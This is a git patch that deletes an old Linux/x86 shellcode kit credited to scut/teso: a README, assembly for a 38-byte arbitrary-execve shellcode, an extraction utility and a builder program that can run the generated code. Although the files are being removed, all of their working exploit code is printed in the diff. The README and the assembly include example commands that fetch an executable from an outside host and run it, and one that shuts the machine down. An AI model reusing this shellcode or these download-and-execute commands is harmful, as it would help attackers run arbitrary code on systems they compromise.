From 9da824575b3f4496431691bdb3f6ce45c601accc Mon Sep 17 00:00:00 2001
From: SkyperTHC
Date: Wed, 4 Mar 2026 16:56:48 +0000
Subject: packetstorm sync
---
other/shell/README | 38 --------------
other/shell/sc.s | 51 -------------------
other/shell/shellcode.c | 46 -----------------
other/shell/shellxp | Bin 90748 -> 0 bytes
other/shell/shellxp.c | 130 ------------------------------------------------
5 files changed, 265 deletions(-)
delete mode 100644 other/shell/README
delete mode 100644 other/shell/sc.s
delete mode 100644 other/shell/shellcode.c
delete mode 100755 other/shell/shellxp
delete mode 100644 other/shell/shellxp.c
(limited to 'other/shell')
diff --git a/other/shell/README b/other/shell/README
deleted file mode 100644
index b6fbeaa..0000000
--- a/other/shell/README
+++ /dev/null
@@ -1,38 +0,0 @@
-
-gcc -o shellxp shellxp.c
-
-./shellxp commands ...
-
-or to exec the generated shellcode
-
-./shellxp exec commands ...
-
-
-either rip the sc_build routine into your exploits to directly create the
-shellcode on the fly, or prepare it.
-
-some examples:
-
-./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a"
-./shellxp /bin/sh -c "echo haha > /tmp/owned"
-./shellxp /sbin/shutdown -h now
-
-or especially fancy ;-)
-
-./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh"
-
- (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file)
- modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-)
-
-(imagine some other fancy stuff in here :-)
-...
-
--scut/teso.
-
-
-to modify the shellcode, use:
-
-gcc -o shellcode shellcode.c sc.s
-./shellcode <-- will dump the code
-./shellcode foo <-- will dump and run the code
-
diff --git a/other/shell/sc.s b/other/shell/sc.s
deleted file mode 100644
index 6133b3e..0000000
--- a/other/shell/sc.s
+++ /dev/null
@@ -1,51 +0,0 @@
-/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
-
-.data
-.globl cbegin
-.globl cend
-
-cbegin:
-
- jmp jahead
-
-docall:
- pop %edi
-
- movl %edi, %esp
- not %sp /* build new stack frame */
-
- xorl %eax, %eax /* read number of arguments */
- movb (%edi), %al
- inc %edi
-
-decl1: push %edi
-decl2: scasb /* search delim bytes */
- jnz decl2
-
- movb %ah, -1(%edi)
- dec %eax
- jnz decl1
-
- pop %ebx /* pathname */
- push %ebx
-
- push %eax
- pop %edx /* esp -= 4, edx = &envp[] = NULL */
- movl %esp, %ecx /* ecx = &argv[] */
-
- movb $11, %al
- int $0x80
-
-jahead: call docall
-
-/* reverse order arguments */
-.byte 0x03 /* number of arguments */
-.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
-.byte 0x03
-.ascii "-c"
-.byte 0x02
-.ascii "/bin/sh"
-.byte 0x01
-
-cend:
-
diff --git a/other/shell/shellcode.c b/other/shell/shellcode.c
deleted file mode 100644
index 1fc68cf..0000000
--- a/other/shell/shellcode.c
+++ /dev/null
@@ -1,46 +0,0 @@
-/* shellcode extraction utility,
- * by type / teso, small mods by scut.
- */
-
-
-#include
-#include
-
-extern void cbegin ();
-extern void cend ();
-
-
-int
-main (int argc, char *argv[])
-{
- int i;
- unsigned char * buf = (unsigned char *) cbegin;
- unsigned char ex_buf[1024];
-
-
- printf ("/* %d byte shellcode */\n", cend - cbegin);
- printf ("\"");
- for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
-
- printf ("\\x%02x", *buf & 0xff);
-
- if (++i >= 12) {
- i = 0;
- printf ("\"\n\"");
- }
- }
- printf ("\";\n");
-
- printf("\n");
-
- if (argc > 1) {
- printf ("%02x\n", ((unsigned char *) cbegin)[0]);
- printf ("%02x\n", ex_buf[0]);
- memcpy (ex_buf, cbegin, cend - cbegin);
- printf ("%02x\n", ex_buf[0]);
- ((void (*)()) &ex_buf)();
- }
-
- exit (EXIT_SUCCESS);
-}
-
diff --git a/other/shell/shellxp b/other/shell/shellxp
deleted file mode 100755
index c52acb2..0000000
Binary files a/other/shell/shellxp and /dev/null differ
diff --git a/other/shell/shellxp.c b/other/shell/shellxp.c
deleted file mode 100644
index 4d5916b..0000000
--- a/other/shell/shellxp.c
+++ /dev/null
@@ -1,130 +0,0 @@
-
-#include
-#include
-#include
-#include
-#include
-
-
-/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
- */
-unsigned char shellcode[] =
- "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
- "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
- "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
- "\xff\xff";
-
-static int sc_build (unsigned char *target, size_t target_len,
- unsigned char *shellcode, char **argv);
-
-void hexdump (unsigned char *cbegin, unsigned char *cend);
-
-
-static int
-sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
- char **argv)
-{
- int i;
- size_t tl_orig = target_len;
-
-
- if (strlen (shellcode) >= (target_len - 1))
- return (-1);
-
- memcpy (target, shellcode, strlen (shellcode));
- target += strlen (shellcode);
- target_len -= strlen (shellcode);
-
- for (i = 0 ; argv[i] != NULL ; ++i)
- ;
-
- /* set argument count
- */
- target[0] = (unsigned char) i;
- target++;
- target_len--;
-
- for ( ; i > 0 ; ) {
- i -= 1;
-
- if (strlen (argv[i]) >= target_len)
- return (-1);
-
- printf ("[%3d/%3d] adding (%2d): %s\n",
- (tl_orig - target_len), tl_orig,
- strlen (argv[i]), argv[i]);
-
- memcpy (target, argv[i], strlen (argv[i]));
- target += strlen (argv[i]);
- target_len -= strlen (argv[i]);
-
- target[0] = (unsigned char) (i + 1);
- target++;
- target_len -= 1;
- }
-
- return (tl_orig - target_len);
-}
-
-
-void
-hexdump (unsigned char *cbegin, unsigned char *cend)
-{
- int i;
- unsigned char * buf = cbegin;
-
-
- printf ("/* %d byte shellcode */\n", cend - cbegin);
- printf ("\"");
-
- for (i = 0 ; buf < cend; ++buf) {
-
- printf ("\\x%02x", *buf & 0xff);
-
- if (++i >= 12) {
- i = 0;
- printf ("\"\n\"");
- }
- }
- printf ("\";\n\n");
-}
-
-
-int
-main (int argc, char *argv[])
-{
- int n;
- unsigned char tbuf[2048];
- void (* tbuf_f)(void) = (void *) tbuf;
-
-
- printf ("build exploit shellcode\n");
- printf ("-scut / teso.\n\n");
-
- if (argc < 2) {
- printf ("usage: %s
[exec] commands ...\n\n",
- argv[0]);
-
- exit (EXIT_FAILURE);
- }
-
- printf ("constructing shellcode...\n\n");
- memset (tbuf, '\x00', sizeof (tbuf));
- if (strcmp (argv[1], "exec") == 0)
- n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
- else
- n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
- if (n == -1) {
- printf ("failed to build it.\n");
- exit (EXIT_FAILURE);
- }
-
- printf ("shellcode size: %d bytes\n\n", n);
- hexdump (tbuf, tbuf + n);
-
- if (strcmp (argv[1], "exec") == 0)
- tbuf_f ();
-
- exit (EXIT_SUCCESS);
-}
-
-- cgit v1.3